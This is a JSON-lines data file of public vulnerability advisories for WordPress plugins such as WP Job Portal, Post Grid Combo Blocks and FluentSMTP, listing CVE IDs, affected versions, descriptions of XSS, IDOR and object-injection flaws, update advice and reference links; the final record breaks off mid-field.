{"CVE_ID":"CVE-2024-10149","slug":"instagram-slider-widget","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The Social Slider Feed WordPress plugin before 2.2.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1619dc4b-4e5e-4b82-820b-3c4e732db3ad\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1619dc4b-4e5e-4b82-820b-3c4e732db3ad\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11351","slug":"restricted-content","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The Restrict \u2013 membership, site, content and user access restrictions for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.8 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201494\\\/restricted-content\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201494\\\/restricted-content\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de982653-26b4-4a7b-a391-373362bcb834?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de982653-26b4-4a7b-a391-373362bcb834?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-45803","slug":"forms-gutenberg","versionImpact":"2.2.8.3","versionEndExcluding":"2.2.9","description":"Missing Authorization vulnerability in Nikolay Strikhar WordPress Form Builder Plugin \u2013 Gutenberg Forms.This issue affects WordPress Form Builder Plugin \u2013 Gutenberg Forms: from n\/a through 2.2.8.3.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forms-gutenberg\\\/wordpress-gutenberg-forms-plugin-2-2-8-3-auth-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forms-gutenberg\\\/wordpress-gutenberg-forms-plugin-2-2-8-3-auth-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6586","slug":"download-plugin","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The Download Plugin plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the dpwap_plugin_locInstall function in all versions up to, and including, 2.2.8. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/tags\\\/2.2.8\\\/app\\\/Plugins\\\/Dpwapuploader.php#L300\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-plugin\\\/tags\\\/2.2.8\\\/app\\\/Plugins\\\/Dpwapuploader.php#L300\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37734c25-cce3-41fb-babf-714ba7a4bced?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37734c25-cce3-41fb-babf-714ba7a4bced?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5664","slug":"garden-gnome-package","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The Garden Gnome Package plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ggpkg' shortcode in all versions up to, and including, 2.2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This was partially patched in version 2.2.7 and fully patched in version 2.2.9.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c7385c7-47de-4511-b474-7415c3977aa8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c7385c7-47de-4511-b474-7415c3977aa8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/garden-gnome-package\\\/tags\\\/2.2.5\\\/include\\\/ggpackage.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/garden-gnome-package\\\/tags\\\/2.2.5\\\/include\\\/ggpackage.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987987\\\/garden-gnome-package#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2987987\\\/garden-gnome-package#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988944\\\/garden-gnome-package#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988944\\\/garden-gnome-package#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5531","slug":"ocean-extra","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The Ocean Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Flickr widget in all versions up to, and including, 2.2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b39e17c5-711f-4229-90f4-213ea65a190d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b39e17c5-711f-4229-90f4-213ea65a190d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.2.8\\\/includes\\\/widgets\\\/flickr.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ocean-extra\\\/tags\\\/2.2.8\\\/includes\\\/widgets\\\/flickr.php#L59\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13873","slug":"wp-job-portal","versionImpact":"2.2.8","versionEndExcluding":"2.2.9","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.8 via the deleteUserPhoto() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to remove profile photos from users accounts. Please note that this does not officially delete the file.","recommendation":"Update to version 2.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242653\\\/wp-job-portal\\\/tags\\\/2.2.9\\\/includes\\\/classes\\\/uploads.php?old=3238353&old_path=wp-job-portal%2Ftags%2F2.2.8%2Fincludes%2Fclasses%2Fuploads.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242653\\\/wp-job-portal\\\/tags\\\/2.2.9\\\/includes\\\/classes\\\/uploads.php?old=3238353&old_path=wp-job-portal%2Ftags%2F2.2.8%2Fincludes%2Fclasses%2Fuploads.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdba3c5-382e-4d2b-83d8-0e0cebf2e63c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdba3c5-382e-4d2b-83d8-0e0cebf2e63c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7588","slug":"post-grid","versionImpact":"2.2.84","versionEndExcluding":"2.2.88","description":"The Gutenberg Blocks, Page Builder \u2013 ComboBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Accordion block in all versions up to, and including, 2.2.87 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.88, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/248a9cb2-24e8-46b2-9ef8-23a8444a922d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/248a9cb2-24e8-46b2-9ef8-23a8444a922d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133880\\\/post-grid\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3133880\\\/post-grid\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6346","slug":"post-grid","versionImpact":"2.2.85","versionEndExcluding":"2.2.86","description":"The Gutenberg Blocks, Page Builder \u2013 ComboBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the redirectURL parameter of the Date Countdown widget, in all versions up to, and including, 2.2.85a due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.86, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1512d911-167f-4653-ab20-cb057b83dab1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1512d911-167f-4653-ab20-cb057b83dab1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.84\\\/includes\\\/blocks\\\/date-countdown\\\/front-scripts.js#L117\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.84\\\/includes\\\/blocks\\\/date-countdown\\\/front-scripts.js#L117\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.84\\\/includes\\\/blocks\\\/date-countdown\\\/index.php#L283\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid\\\/tags\\\/2.2.84\\\/includes\\\/blocks\\\/date-countdown\\\/index.php#L283\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9511","slug":"fluent-smtp","versionImpact":"2.2.82","versionEndExcluding":"2.2.83","description":"The FluentSMTP \u2013 WP SMTP Plugin with Amazon SES, SendGrid, MailGun, Postmark, Google and Any SMTP Provider plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.2.82 via deserialization of untrusted input in the 'formatResult' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. The vulnerability was partially patched in version 2.2.82.","recommendation":"Update to version 2.2.83, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluent-smtp\\\/trunk\\\/app\\\/Models\\\/Logger.php#L157\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fluent-smtp\\\/trunk\\\/app\\\/Models\\\/Logger.php#L157\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194359\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194359\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194555\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3194555\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3deedc4-b939-4c54-8376-95d3728872d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3deedc4-b939-4c54-8376-95d3728872d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3155","slug":"post-grid","versionImpact":"2.2.80","versionEndExcluding":"2.2.81","description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel \u2013 Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.81, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84bc611c-c38a-4282-9a9b-5bb9157fb1de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84bc611c-c38a-4282-9a9b-5bb9157fb1de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084503%40post-grid%2Ftrunk&old=3078364%40post-grid%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3084503%40post-grid%2Ftrunk&old=3078364%40post-grid%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1988","slug":"post-grid","versionImpact":"2.2.80","versionEndExcluding":"2.2.81","description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel \u2013 Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' attribute in blocks in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.81, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49da9e7-26a1-442b-b5d0-1da3bcf0e8c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e49da9e7-26a1-442b-b5d0-1da3bcf0e8c9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084503\\\/post-grid\\\/tags\\\/2.2.81\\\/includes\\\/blocks\\\/accordion-nested-item\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084503\\\/post-grid\\\/tags\\\/2.2.81\\\/includes\\\/blocks\\\/accordion-nested-item\\\/index.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4042","slug":"post-grid","versionImpact":"2.2.80","versionEndExcluding":"2.2.81","description":"The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel \u2013 Combo Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' attribute of the menu-wrap-item block in all versions up to, and including, 2.2.80 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.2.81, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55e6eb58-79e2-4404-887a-0392ce7914aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55e6eb58-79e2-4404-887a-0392ce7914aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084503\\\/post-grid\\\/tags\\\/2.2.81\\\/includes\\\/blocks\\\/menu-wrap-item\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084503\\\/post-grid\\\/tags\\\/2.2.81\\\/includes\\\/blocks\\\/menu-wrap-item\\\/index.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6565","slug":"aforms-form-builder-for-price-calculator-cost-estimation","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The AForms \u2014 Form Builder for Price Calculator & Cost Estimation plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.2.6. This is due to the plugin utilizing the aura library and allowing direct access to the phpunit test files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702261eb-4f85-4388-9f82-75476640e8ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702261eb-4f85-4388-9f82-75476640e8ed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aforms-form-builder-for-price-calculator-cost-estimation\\\/trunk\\\/vendor\\\/aura\\\/payload-interface\\\/phpunit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/aforms-form-builder-for-price-calculator-cost-estimation\\\/trunk\\\/vendor\\\/aura\\\/payload-interface\\\/phpunit.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118052%40aforms-form-builder-for-price-calculator-cost-estimation&new=3118052%40aforms-form-builder-for-price-calculator-cost-estimation&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3118052%40aforms-form-builder-for-price-calculator-cost-estimation&new=3118052%40aforms-form-builder-for-price-calculator-cost-estimation&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13429","slug":"wp-job-portal","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.6 via the 'jobenforcedelete' due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with employer-level access and above, to delete arbitrary","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/job\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fjob%2Fcontroller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/job\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fjob%2Fcontroller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cbce69a-53d0-4b83-9b7a-893a6b9c39c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cbce69a-53d0-4b83-9b7a-893a6b9c39c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13428","slug":"wp-job-portal","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.6 via the deleteCompanyLogo() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to delete arbitrary company logos.","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/company\\\/model.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fcompany%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/company\\\/model.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fcompany%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7c786fe-898e-4478-97b9-c1fb41c9081c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7c786fe-898e-4478-97b9-c1fb41c9081c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13425","slug":"wp-job-portal","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.6 via the enforcedelete() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Employer-level access and above, to delete other users companies.","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/company\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fcompany%2Fcontroller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/company\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fcompany%2Fcontroller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a14e110f-0850-44f4-8de3-95a654096ae8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a14e110f-0850-44f4-8de3-95a654096ae8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13372","slug":"wp-job-portal","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.6 via the getresumefiledownloadbyid() and getallresumefiles() functions due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to download users resumes without the appropriate authorization to do so.","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/resume\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fresume%2Fcontroller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/resume\\\/controller.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fresume%2Fcontroller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e00e65ba-db58-4d13-8cb3-c4d62a2553fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e00e65ba-db58-4d13-8cb3-c4d62a2553fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13371","slug":"wp-job-portal","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Job Portal \u2013 A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to unauthorized arbitrary emails sending due to a missing capability check on the sendEmailToJobSeeker() function in all versions up to, and including, 2.2.6. This makes it possible for unauthenticated attackers to send arbitrary emails with arbitrary content from the sites mail server.","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/31b04bc057046ecc54c3552387eb7bca\",\"name\":\"https:\\\/\\\/gist.github.com\\\/g1-nhantv\\\/31b04bc057046ecc54c3552387eb7bca\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/jobapply\\\/model.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fjobapply%2Fmodel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229608\\\/wp-job-portal\\\/tags\\\/2.2.7\\\/modules\\\/jobapply\\\/model.php?old=3216415&old_path=wp-job-portal%2Ftags%2F2.2.6%2Fmodules%2Fjobapply%2Fmodel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a84a4c56-a44e-450d-91fc-024f8ddeedee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a84a4c56-a44e-450d-91fc-024f8ddeedee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11503","slug":"my-wp-tabs","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The WP Tabs  WordPress plugin before 2.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25592b6c-b9ab-4d9e-b314-091594ce9189\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/25592b6c-b9ab-4d9e-b314-091594ce9189\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3477","slug":"popup-box","versionImpact":"2.2.6","versionEndExcluding":"2.2.7","description":"The Popup Box  WordPress plugin before 2.2.7 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting popups via CSRF attacks","recommendation":"Update to version 2.2.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5e59e6-c500-4129-997b-391cdf9aa9c7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca5e59e6-c500-4129-997b-391cdf9aa9c7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7072","slug":"post-grid","versionImpact":"2.2.68","versionEndExcluding":"2.2.69","description":"The Post Grid Combo \u2013 36+ Gutenberg Blocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.68 via the 'get_posts' REST API Endpoint. This makes it possible for unauthenticated attackers to extract sensitive data including full draft posts and password protected posts, as well as the password for password-protected posts.","recommendation":"Update to version 2.2.69, or a newer patched 